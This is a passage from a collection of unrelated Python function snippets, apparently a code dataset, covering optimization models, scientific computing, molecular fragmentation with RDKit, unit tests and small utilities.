for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def cuttingStockKantorovich(w, q, B):\n\n model = Model(\"Naive Cutting Stock\")\n m = max(w)*max(q) # m rolls\n n = len(q) # n orders \n y = {}\n for j in range(m):\n y[j] = model.addVar(name = \"y[%s]\" % j, vtype=\"BINARY\")\n \n x = {}\n for j in range(m):\n for i in range(n):\n x[i,j] = model.addVar(name = \"x[%s,%s]\" %(i,j), lb = 0, vtype=\"INTEGER\")\n model.addCons(x[i,j] <= q[i]*y[j])\n\n for i in range(n):\n model.addCons(quicksum(x[i,j] for j in range(m)) == q[i])\n\n for j in range(m):\n model.addCons((quicksum(w[i]*x[i,j] for i in range(n)) <= B))\n\n model.setObjective(quicksum(y[j] for j in range(m)), \"minimize\")\n model.hideOutput()\n model.optimize()\n\n return model.getObjVal()", "def test_family_reservation_max_amount_of_childs(self):\n start_date = datetime.now()\n\n reservation_list = [\n BikeReservationPerHour(start_date) \n ,BikeReservationPerDay(start_date)\n ,BikeReservationPerDay(start_date)\n 
,BikeReservationPerWeek(start_date)\n ,BikeReservationPerWeek(start_date)\n ,BikeReservationPerWeek(start_date)\n ]\n\n with self.assertRaises(InvalidAmountOfBikeReservationsOnFamiliyError):\n family_reservation = FamilyBikeReservation(reservation_list)", "def other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def gram_schmidt(basis):\n b1 = basis[0]\n b2 = basis[1]\n\n basis1 = b1 / sqrt(innerprod_q2(b1, b1))\n b2 = b2 - innerprod_q2(basis1, b2) * basis1\n basis2 = b2 / sqrt(innerprod_q2(b2, b2))\n\n basis_o = [basis1, basis2]\n\n return (basis_o)", "def make_words(self,lm):\n if \" \" in self.corpus[0] and \" \" in self.corpus[1]: \n print \"assuming BLICK\"\n self.corpus = [convert_to_disc(i) for i in self.corpus]\n else:\n self.disc = 1\n print \"assuming Disc\" \n if not os.path.isfile(self.f): ##check if it already exists\n print \"generating 10 million words\"\n outfile = open(self.f, \"w\")\n outfile.write(\"word,blick,ngram,Real,T,disc\\n\")\n for word in self.corpus:\n write_row_of_bigmatch(word, self.disc, outfile, lm, \"Real\", \"1\")\n while len(self.wordlist)<10000000: \n words = lm.generate(100)\n for word in words:\n if word not in self.wordlist and len(word) < 9: #keep only words less than len9\n write_row_of_bigmatch(word, self.disc, outfile, lm, \"Simulated\", \"0\")\n self.wordlist[word] = 0\n return", "def create_ising_wishbone(h, w, **kwargs):\n assert h == 2 # Only works for 2 branches\n G = nx.empty_graph(h * w)\n n = w\n G.add_edges_from([(v, v+1) for v in range(n-1)])\n G.add_edges_from([(v, v+1) for v in range(n,2*n-1)])\n G.add_edges_from([(v, v+n) for v in range(n // 2)]) # Connect first half of nodes\n return nx.to_numpy_matrix(G)", "def _get_brown_clusters(self, a_feats, a_toks1, a_toks2):\n bcluster_str = \"\"\n for w1, _ in a_toks1:\n if w1 not in BROWN_CLUSTERS:\n continue\n for w2, _ in a_toks2:\n if w2 not in BROWN_CLUSTERS:\n continue\n bcluster_str = \"BrownCluster-\" + BROWN_CLUSTERS[w1] + '%' + \\\n BROWN_CLUSTERS[w2]\n a_feats[bcluster_str] = 1.", "def bond_strain_list(xy, BL, bo):\n bL = bond_length_list(xy, BL)\n # print 'len(bL) = ', len(bL)\n # print 'len(bo) = ', len(bo)\n bs = (bL - bo) / bo\n return bs", "def snake(A, B, M, N, k, y):\n\n x = y - k\n while (x < M) and (y < N) and (A[x] == B[y]):\n x = x + 1\n y = y + 1\n return y", "def _check_multiplicity(self, k, i):\n for j in range(self._.d + 1):\n if self._.a[i] >= k[i]:\n raise InfeasibleError(\"%s of %s %d too large\" %\n 
(self.SIZE, self.PART, i))", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def create_hard_blocks(self):\n for x in xrange(1, self.map_size[0], 2):\n for y in xrange(1, self.map_size[1], 2):\n self.create_hard_block_at(x, y)", "def test_breath_first_traversal(our_bsts):\n bft = []\n for i in our_bsts[0].breadth_first_traversal():\n bft.append(i)\n assert bft == our_bsts[3]", "def offspring_fertility(n1=4,n2=4):\n ary = np.zeros( (n1,n2, n1,n2, 3), float )\n for i in range(n1):\n for j in range(n2):\n for k in range(n1):\n for l in range(n2):\n # set group counter to zero (one counter is sufficient)\n gc1 = 0\n for index in [i,j,k,l]: \n if index in [0,1]: gc1+=1\n if gc1==0 or gc1==4:\n ary[i,j,k,l,0] = 1. # set mark at S0\n elif gc1==1 or gc1==3:\n ary[i,j,k,l,2] = 1. # set mark at S2\n else:\n ary[i,j,k,l,1] = 1. # set mark at S1\n return ary", "def w_mark2_gen(w_amount, w_length, dict_2_let):\r\n nword_list_m2 = []\r\n for i in range(w_amount):\r\n rand_2_let = rand_let_gen(dict_2_let)\r\n nword = \"\".join(rand_2_let)\r\n i = 0\r\n while len(nword) != w_length:\r\n prefix = nword[i:i+2:1]\r\n if dict_2_let.get(prefix) != None:\r\n nword += (dict_2_let[prefix][0])\r\n i += 1\r\n else:\r\n i = 0\r\n rand_2_let = rand_let_gen(dict_2_let)\r\n nword_list_m2.append(nword)\r\n return nword_list_m2", "def _dks_to_khlp_on_basis(self, la):\n Sym = self._kBoundedRing.ambient()\n kB = Sym.kBoundedSubspace(self.k, t=self.t)\n Qp = Sym.hall_littlewood(t=self.t).Qp()\n ks = kB.kschur()\n kHLP = self._kBoundedRing.kHallLittlewoodP()\n return sum( ks(Qp(x)).coefficient(la) * kHLP(x) for x in PartitionsGreatestLE(sum(la), self.k))", "def _get_identifiers_from_kbs(self) -> dict:\n id_mapping_dict = defaultdict(set)\n\n for kb in self.kbs:\n sys.stdout.write('\\n%s \\n' % kb.name)\n for p in tqdm.tqdm(kb.pathways, total=len(kb.pathways)):\n for ent in p.entities:\n id_set = list(set(ent.xrefs))\n if len(id_set) == 1:\n id_mapping_dict[id_set.pop()] = set([])\n for p, q in itertools.combinations(id_set, 2):\n id_mapping_dict[p].add(q)\n id_mapping_dict[q].add(p)\n\n return id_mapping_dict", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def set_limits(self):\n K = self.parents\n S = self.structure\n T = self.T_zero\n kinematic_map = self.kinematic_map\n T_axis = trans_axis(self.axis_length, \"z\")\n for u in K:\n for v in (des for des in K.successors(u) if des):\n S[u][v][LOWER] = S[u][v][DIST]\n S[u][v][UPPER] = S[u][v][DIST]\n for v in (des for des in level2_descendants(K, u) if 
des):\n names = [\n (f\"p{u[1:]}\", f\"p{v[1:]}\"),\n (f\"p{u[1:]}\", f\"q{v[1:]}\"),\n (f\"q{u[1:]}\", f\"p{v[1:]}\"),\n (f\"q{u[1:]}\", f\"q{v[1:]}\"),\n ]\n\n for ids in names:\n path = kinematic_map[u][v]\n T0, T1, T2 = [T[path[0]], T[path[1]], T[path[2]]]\n\n if \"q\" in ids[0]:\n T0 = T0.dot(T_axis)\n if \"q\" in ids[1]:\n T2 = T2.dot(T_axis)\n\n d_max, d_min, limit = self.max_min_distance(T0, T1, T2)\n\n if limit:\n\n rot_limit = rot_axis(self.ub[v], \"z\")\n\n T_rel = T1.inv().dot(T2)\n\n d_limit = norm(T1.dot(rot_limit).dot(T_rel).trans - T0.trans)\n\n if limit == \"above\":\n d_max = d_limit\n else:\n d_min = d_limit\n\n self.limited_joints += [v]\n self.limit_edges += [[ids[0], ids[1]]] # TODO remove/fix\n\n S.add_edge(ids[0], ids[1])\n if d_max == d_min:\n S[ids[0]][ids[1]][DIST] = d_max\n S[ids[0]][ids[1]][UPPER] = d_max\n S[ids[0]][ids[1]][LOWER] = d_min\n S[ids[0]][ids[1]][BOUNDED] = limit", "def make_m2_crv(TSUGITE_list, SHIGUCHI_list):\n \"\"\"\n 1 Get information from TSUGITE_list and SHIGUCHI_list.\n \"\"\"\n # TSUGITE\n # Left----------------------------------------------------------------------\n # material2\n m2_left_list = TSUGITE_list[0]\n m2_left_upper = m2_left_list[0]\n m2_left_middle = m2_left_list[1]\n m2_left_lower = m2_left_list[2]\n\n # SHIGUCHI\n m2_KUMIKI_points1 = SHIGUCHI_list[4]\n m2_KUMIKI_points2 = SHIGUCHI_list[5]\n\n m2_KUMIKI_points1.reverse()\n\n m2_left_upper.extend(m2_KUMIKI_points1)\n m2_left_upper.append(m2_left_upper[0])\n m2_left_upper_crv = rs.AddPolyline(m2_left_upper)\n\n m2_left_middle.extend(m2_KUMIKI_points1)\n m2_left_middle.append(m2_left_middle[0])\n m2_left_middle_crv = rs.AddPolyline(m2_left_middle)\n\n m2_left_lower.extend(m2_KUMIKI_points1)\n m2_left_lower.append(m2_left_lower[0])\n m2_left_lower_crv = rs.AddPolyline(m2_left_lower)\n\n m2_left_crvs = [m2_left_upper_crv, m2_left_middle_crv, m2_left_lower_crv]\n\n # Right---------------------------------------------------------------------\n m2_right_list = TSUGITE_list[1]\n m2_right_upper = m2_right_list[0]\n m2_right_middle = m2_right_list[1]\n m2_right_lower = m2_right_list[2]\n\n # SHIGUCHI\n m2_KUMIKI_points1 = SHIGUCHI_list[0]\n m2_KUMIKI_points2 = SHIGUCHI_list[1]\n\n # Extend\n # material2\n m2_right_upper.reverse()\n m2_right_middle.reverse()\n m2_right_lower.reverse()\n\n # m2_KUMIKI_points1.reverse()\n\n m2_right_upper.extend(m2_KUMIKI_points1)\n m2_right_upper.append(m2_right_upper[0])\n m2_right_upper_crv = rs.AddPolyline(m2_right_upper)\n\n m2_right_middle.extend(m2_KUMIKI_points1)\n m2_right_middle.append(m2_right_middle[0])\n m2_right_middle_crv = rs.AddPolyline(m2_right_middle)\n\n m2_right_lower.extend(m2_KUMIKI_points1)\n m2_right_lower.append(m2_right_lower[0])\n m2_right_lower_crv = rs.AddPolyline(m2_right_lower)\n\n m2_right_crvs = [m2_right_upper_crv, m2_right_middle_crv, m2_right_lower_crv]\n\n return m2_left_crvs, m2_right_crvs", "def test_markow_chain():\n amount = len(markow_chain(SNULL, TIMESTEPS, PROBABILITYMATRIX))\n assert TIMESTEPS == amount", "def build_blacklist(blk_lst):\n bad_pair_dict = {}\n for stu in blk_lst:\n if stu[0] in bad_pair_dict: # Appends additional student to stu[0]'s blacklist\n bad_pair_dict[stu[0]].add(stu[1])\n else: # Adds stu[0] to the blacklist dict with the set of themself and their banned partner\n bad_pair_dict[stu[0]] = {stu[0], stu[1]}\n if stu[1] in bad_pair_dict: # Mirrors the actions taken above now for stu[1]\n bad_pair_dict[stu[1]].add(stu[0])\n else: # Mirrors the actions taken above now for stu[1]\n 
bad_pair_dict[stu[1]] = {stu[0], stu[1]}\n return bad_pair_dict", "def get_building_blocks(self, level=1, debug=False):\n\n def get_aidx_star(dic, ias, kas):\n iat, jat = kas\n if dic[iat] == 0:\n return iat, jat\n elif dic[jat] == 0:\n return jat, iat\n else:\n print('#ERROR:?')\n raise\n\n def get_aidxs_patt(m0, patt, ias0):\n Qi = Chem.MolFromSmarts( patt )\n zs_i = [ ai.GetAtomicNum() for ai in Qi.GetAtoms() ]\n iass_i = m0.GetSubstructMatches(Qi)\n ias0.sort()\n #print ' ** ias0 = ', ias0\n iok = False\n for ias in iass_i:\n #print ' ** matched ias = ', ias\n if set(ias) == set(ias0):\n iok = True; break\n assert iok\n dic = dict(list(zip(ias, zs_i)))\n return ias, dic\n\n assert (not self.ih), '#ERROR: pls set `ih=False to get building blocks'\n m1 = copy.deepcopy( self.m )\n Chem.RemoveStereochemistry(m1)\n\n iars = []\n for ai in m1.GetAtoms():\n iars.append( ai.GetIsAromatic() )\n\n # first update BO for groups such as amide (-N-C(=O), -O-C(=O), ...\n # that is, we consider that the single bonds in these groups can\n # not be broken. This has to be imposed for predicting mp/bp.\n bom = copy.deepcopy( self.bom )\n # as no single bond in any of ['[N-]=[N+]=C', '[N+]#[C-]', '[N-]=[N+]=N']\n # we skip them here\n for pat_i in [ '[O-][N+](=O)', ]: # 'NC(=O)', 'OC(=O)'\n Qi = Chem.MolFromSmarts( pat_i )\n for tsi in m1.GetSubstructMatches(Qi):\n i,j,k = tsi\n bij = bom[i,j] + 100 ##\n bjk = bom[j,k] + 100\n bom[i,j] = bom[j,i] = bij\n bom[k,j] = bom[j,k] = bjk\n\n obsolete = \"\"\"\n # don't break any ring, as such rigid structure has a dramtic effect\n # on mp prediction, so keep them as much as possible for selection\n # of molecules for training\n nodes_r = self.get_ring_nodes(3,6)\n for nodes_i0 in nodes_r:\n nodes_i = list( nodes_i0 )\n nai = len(nodes_i)\n for i in range(nai-1):\n for j in range(i+1,nai):\n boij = bom[i,j]\n if boij > 0:\n bom[i,j] = bom[j,i] = boij + 0.15\n \"\"\"\n\n ## RDKit somehow cannot correctly process '[*;!H]' as a heavy\n ## atom; instead '[*;!#1]' works. 
A bug??\n heav_smarts = '*;!#1'\n\n m = Chem.AddHs(m1)\n m.UpdatePropertyCache(False)\n\n # get bond idxs that can be broken\n # We assume aromatic bonds can be broken; otherwise\n # very few amons can be found for molecules consisting\n # of aromatic atoms\n bom2 = np.triu( bom )\n #ias1, ias2 = np.where( bom2 > 0 ) #\n ias1, ias2 = np.where( np.logical_and( bom2 <= 3, bom2 > 0 ) )\n nb = len(ias1)\n bidxs = []\n for i in range(nb):\n ia1, ia2 = ias1[i], ias2[i]\n bi = m.GetBondBetweenAtoms(ia1, ia2)\n bidx = bi.GetIdx()\n bidxs.append( bidx )\n nb = len(bidxs)\n if nb == 0:\n # no bonds can be broken, i.e., a big aromatic system\n return Chem.MolToSmiles(m)\n\n bidxs.sort()\n #print ' -- bonds = '\n #print np.array([ias1,ias2]); sys.exit(2)\n self.bidxs = bidxs\n\n # now get fragments\n\n # break all bonds with bo = 1\n m2 = Chem.FragmentOnBonds(m, bidxs)\n ts = Chem.MolToSmiles(m2).split('.')\n\n # vital step\n # if this is not done, a fragment like C([*])([*])([*])\n # will also match >CH-, >CH2, -CH3, which we hope not to happen\n # This is inevitable if we don't substitute \"*\" by \"*;!H\"\n # ( H's are present in `m)\n tsU = []\n for ti in ts:\n tsU.append( re.sub('\\*', heav_smarts, ti) )\n ts = tsU\n tsU = list( set( ts ) )\n #print ' -- tsU = ', tsU\n\n if level == 1:\n return tsU\n else:\n iass = []\n mqs = []\n dics = []\n tss = []\n cnodes = []\n for tsi in tsU:\n Qi = Chem.MolFromSmarts( tsi )\n zs_i = []; degrees_i = []\n for ai in Qi.GetAtoms():\n zs_i.append( ai.GetAtomicNum() )\n degrees_i.append( ai.GetDegree() )\n naQ = len(zs_i); iasQ = np.arange(naQ)\n dgrmax = max(degrees_i)\n zs_i = np.array(zs_i)\n degrees_i = np.array(degrees_i)\n ics = iasQ[ np.logical_and(degrees_i == dgrmax, zs_i > 1) ]\n if debug: print((' ics, tsi = ', ics, tsi))\n assert len(ics) == 1, '#ERROR: there should be only one heavy atom with maxiaml degree!'\n #ic = ics[0]\n iass_i = m.GetSubstructMatches(Qi)\n for ias in iass_i:\n #ias = np.array(ias)\n mqs.append( Qi )\n tss.append( tsi )\n dics.append( dict(list(zip(ias, zs_i))) )\n iass.append( list(ias) )\n cnodes.append( ias[ics[0]] ) # [ias[ic] for ic in ics] )\n\n ng = len(iass)\n ts2 = []\n if level == 1.5:\n for i in range(ng-1):\n ias = iass[i]\n mi = mqs[i]\n na1 = len(ias)\n dic_i = dics[i]\n for j in range(i+1,ng):\n mj = mqs[j]\n jas = iass[j]\n dic_j = dics[j]\n kas = list( set(ias).intersection( set(jas) ) )\n if len(kas) == 2:\n # get idx of atom in `m corresponding to [*] in `mi and `mj\n\n if bom[kas[0],kas[1]] == 0:\n # C1C=CC(=O)C=C1\n # 0 1 23 4 5 6 -- atomic index\n # mi = '[*]C=C[*]', ias = [0,1,2,3]\n # mj = '[*]C=C[*]', jas = [3,5,6,0]\n # kas = [3,0] but bom[0,3] = 0, i.e., these two frags cannot bind!\n continue\n try:\n iat, jat = get_aidx_star(dic_i, ias, kas)\n except:\n # e.g., [*]O is a frag of [*][N+](=O)[O-]\n # [*][N+](=O)[O-] [*]O [25, 26]\n # [24, 25, 27, 26] [25, 26]\n # {24: 0, 25: 7, 26: 8, 27: 8} {25: 0, 26: 8}\n continue\n ia = ias.index(iat); ja = jas.index(jat)\n mij = Chem.CombineMols(mi,mj)\n mc = Chem.EditableMol(mij)\n\n # reconnect the bond first\n ia2 = ias.index(jat); ja2 = jas.index(iat)\n print(('ia2,ja2 = ', ia2,ja2))\n bij = m.GetBondBetweenAtoms(iat,jat)\n mc.AddBond(ia2, ja2+na1, bij.GetBondType() ) #rdkit.Chem.rdchem.BondType.SINGLE)\n\n # delete the atom in mij\n ia = ias.index(iat);\n ldxs = [ia, ja+na1]\n\n for l in range(2):\n mc.RemoveAtom(ldxs[l]-l)\n\n mcU = mc.GetMol()\n #mcU2 = Chem.RemoveHs(mcU)\n smi = Chem.MolToSmiles( mcU)\n if '.' 
in smi:\n # e.g., [*]C[*] [*]C[*] [19, 21]\n # [18, 19, 21] [20, 19, 21]\n # {18: 0, 19: 6, 21: 0} {19: 6, 20: 0, 21: 0}\n # [*].[*]C[*]\n continue\n #if '[*]' not in smi:\n # print '\\n', tss[i], tss[j], kas\n # print ias, jas\n # print dic_i, dic_j\n # print smi\n if smi not in ts2: ts2.append(smi)\n elif level == 2:\n # account for all neighbors of any env in\n ifs = list(range(ng))\n for i in ifs:\n\n ias = iass[i]\n mi = mqs[i]; #mic = mqs[i]\n na1 = len(ias); #na1c = len(ias)\n dic_i = dics[i]; #dic_ic = dics[i]\n jfs = list( set(ifs)^set([i]) )\n\n if debug: print(('i, mi, ias = ', i, tss[i], ias))\n #print ' -- i = ', i\n\n icnt = 0\n cnode = cnodes[i]\n for j in jfs:\n #print ' icnt = ', icnt\n mj = mqs[j]\n jas = iass[j]\n if debug:\n print((' j, mj, jas = ', j, tss[j], jas))\n if icnt > 0:\n print(' mi, ias = ', '', patt, ias)\n print(' dic_i = ', dic_i)\n else:\n print(' _mi, ias = ', '', tss[i], ias)\n dic_j = dics[j]\n kas = list( set(ias).intersection( set(jas) ) )\n #print ' -- cnode, kas = ', cnode, kas\n if ( len(kas) == 2 ) and ( cnode in set(kas) ):\n if debug:\n print(' -- kas = ', kas)\n if bom[kas[0],kas[1]] == 0:\n # C1C=CC(=O)C=C1\n # 0 1 23 4 5 6 -- atomic index\n # mi = '[*]C=C[*]', ias = [0,1,2,3]\n # mj = '[*]C=C[*]', jas = [3,5,6,0]\n # kas = [3,0] but bom[0,3] = 0, i.e., these two frags cannot bind!\n continue\n\n las = list( set(ias) | set(jas) ); las.sort()\n try:\n # get idx of atom in `m corresponding to [*] in `mi and `mj\n iat, jat = get_aidx_star(dic_i, ias, kas)\n except:\n # e.g., [*]O is a frag of [*][N+](=O)[O-]\n # [*][N+](=O)[O-] [*]O [25, 26]\n # [24, 25, 27, 26] [25, 26]\n # {24: 0, 25: 7, 26: 8, 27: 8} {25: 0, 26: 8}\n continue\n\n\n mij = Chem.CombineMols(mi,mj)\n #print ' combined smi = ', Chem.MolToSmiles(mij,canonical=False)\n mc = Chem.EditableMol(mij)\n\n # reconnect the bond first\n ia2 = ias.index(jat); ja2 = jas.index(iat)\n #print ' __ ia2, ja2 = ', ia2, ja2+na1\n bij = m.GetBondBetweenAtoms(iat,jat)\n mc.AddBond(ia2, ja2+na1, bij.GetBondType() ) #rdkit.Chem.rdchem.BondType.SINGLE)\n\n # delete the atom in mij\n ia = ias.index(iat); ja = jas.index(jat)\n #print ' __ ia2, ja2, ia, ja = ', ia2, ja2, ia, ja\n ldxs = [ia, ja+na1]; #print ' __ ldxs = ', ldxs\n for l in range(2):\n mc.RemoveAtom(ldxs[l]-l)\n\n # update `mi\n #try:\n mi2 = mc.GetMol()\n patt = Chem.MolToSmiles( mi2, canonical=False )\n mi3 = Chem.MolFromSmarts(patt)\n patt = re.sub('\\-', '', patt)\n patt = re.sub('\\*', heav_smarts, patt)\n if debug:\n print(' -- patt = ', patt)\n\n if '.' in patt:\n # e.g., [*]C[*] [*]C[*] [19, 21]\n # [18, 19, 21] [20, 19, 21]\n # {18: 0, 19: 6, 21: 0} {19: 6, 20: 0, 21: 0}\n # [*].[*]C[*]\n continue\n else:\n # update `ias\n ias, dic_i = get_aidxs_patt(m, patt, las)\n mi = mi3\n if debug:\n print(' -- ias = ', ias)\n na1 = len(ias)\n\n icnt += 1\n try:\n smi = Chem.MolToSmiles( Chem.MolFromSmarts(patt), canonical=True )\n smi = re.sub('\\-', '', smi)\n smi = re.sub('\\*', heav_smarts, smi)\n\n if smi not in ts2: ts2.append(smi)\n except:\n pass\n print(' icnt = ', icnt)\n print(' j, mj, jas = ', j, tss[j], jas)\n print(' i, mi, ias = ', i, tss[i], ias)\n return ts2\n else:\n print('#ERROR: not implemented')\n raise", "def __no_crossing(self):\n for pos_left_1 in range(self.n):\n for pos_left_2 in range(pos_left_1 + 1, self.n):\n for pos_right_2 in range(self.n):\n for pos_right_1 in range(pos_right_2 + 1, self.n):\n # For all i, j, k, m | k < i and m > j . 
not w(i, j) or not w(k, m)\n self.__clause(-self.preds.w(pos_left_1, pos_right_1),\n -self.preds.w(pos_left_2, pos_right_2))", "def test_2_layer():\r\n # angular frequency in radians * THz\r\n w = 100 * nu.THz\r\n # Relative permittivity of metal and dielectric\r\n em = -4.56 + 0.12j\r\n ed = 1.23 + 0.01j\r\n ex_list = ez_list = [ed, em]\r\n # Relative permeabilities\r\n mu_list = [1,1]\r\n # Dictionary of input parameters\r\n input_params = {'w': w, 'd_list': [inf,inf], 'ex_list': ex_list,\r\n 'ez_list': ez_list, 'mu_list': mu_list}\r\n \r\n # Calculate the theoretical kx\r\n theo_kx = (w / nu.c0) * cmath.sqrt((em * ed) / (em + ed))\r\n if theo_kx.imag < 0:\r\n theo_kx *= -1\r\n print('Theoretical kx:',\r\n '(%.7g+%.7gj) rad/um' % (theo_kx.real / nu.um**-1, theo_kx.imag / nu.um**-1))\r\n \r\n # If I use the theoretical kx value, the mode should be correct and\r\n # all my tests should pass.\r\n params = deepcopy(input_params)\r\n params['kx'] = theo_kx\r\n params = find_all_params_from_kx(params)\r\n kzd, kzm = params['kz_list']\r\n # check that kz_list is correct\r\n assert_floats_are_equal(kzd**2, (w**2 / nu.c0**2) * ed**2 / (em + ed))\r\n assert_floats_are_equal(kzm**2, (w**2 / nu.c0**2) * em**2 / (em + ed))\r\n # check that layer_bottom_list is correct\r\n assert params['layer_bottom_list'][0] == -inf\r\n assert params['layer_bottom_list'][1] == 0\r\n # Check that the boundary condition matrix agrees with hand-calculation\r\n bc_mat = bc_matrix(params)\r\n # ...top-left is Ex0down / H0down\r\n assert_floats_are_equal(bc_mat[0,0], -kzd / (w * ed * nu.eps0))\r\n # ...top-right is -Ex1up / H1up\r\n assert_floats_are_equal(bc_mat[0,1], -kzm / (w * em * nu.eps0))\r\n # ...bottom-left is eps0 * Ez0down / H0down\r\n assert_floats_are_equal(bc_mat[1,0], ed * -theo_kx / (w * ed * nu.eps0))\r\n # ...bottom-right is -eps1 * Ez1up / H1up\r\n assert_floats_are_equal(bc_mat[1,1], -em * -theo_kx / (w * em * nu.eps0))\r\n # Check that one of the eigenvalues is almost zero (compared to the size\r\n # of the matrix elements).\r\n eigenvalues = np.linalg.eig(bc_mat)[0]\r\n assert abs(eigenvalues).min() / abs(bc_mat).max() < 1e-6\r\n # Check that the mode passes all tests.\r\n assert check_mode(params, thorough=True) is True\r\n # Check that I can scale the fields and it still passes all tests.\r\n params_scaled = rescale_fields(1.23+4.56j, params)\r\n assert check_mode(params_scaled, thorough=True) is True\r\n \r\n # Now try my kx-finding algorithm, to see if it finds the right value.\r\n kx_list = find_kx(input_params)\r\n print('kx_list:',\r\n ['(%.7g+%.7gj) rad/um' % (kx.real / nu.um**-1, kx.imag / nu.um**-1)\r\n for kx in kx_list])\r\n kx = kx_list[0]\r\n assert_floats_are_equal(theo_kx, kx)\r\n \r\n plot_mode(params)\r\n \r\n print('If you see this message, all the tests succeeded!!')", "def generate_pn2kc_weights(nb_pn, nb_kc, min_pn=10, max_pn=20, aff_pn2kc=None, nb_trials=100000, baseline=25000,\r\n rnd=np.random.RandomState(2018), dtype=np.float32):\r\n\r\n dispersion = np.zeros(nb_trials)\r\n best_pn2kc = None\r\n\r\n for trial in range(nb_trials):\r\n pn2kc = np.zeros((nb_pn, nb_kc), dtype=dtype)\r\n\r\n if aff_pn2kc is None or aff_pn2kc <= 0:\r\n vaff_pn2kc = rnd.randint(min_pn, max_pn + 1, size=nb_pn)\r\n else:\r\n vaff_pn2kc = np.ones(nb_pn) * aff_pn2kc\r\n\r\n # go through every kenyon cell and select a nb_pn PNs to make them afferent\r\n for i in range(nb_pn):\r\n pn_selector = rnd.permutation(nb_kc)\r\n pn2kc[i, pn_selector[:vaff_pn2kc[i]]] = 1\r\n\r\n # This selections mechanism can be 
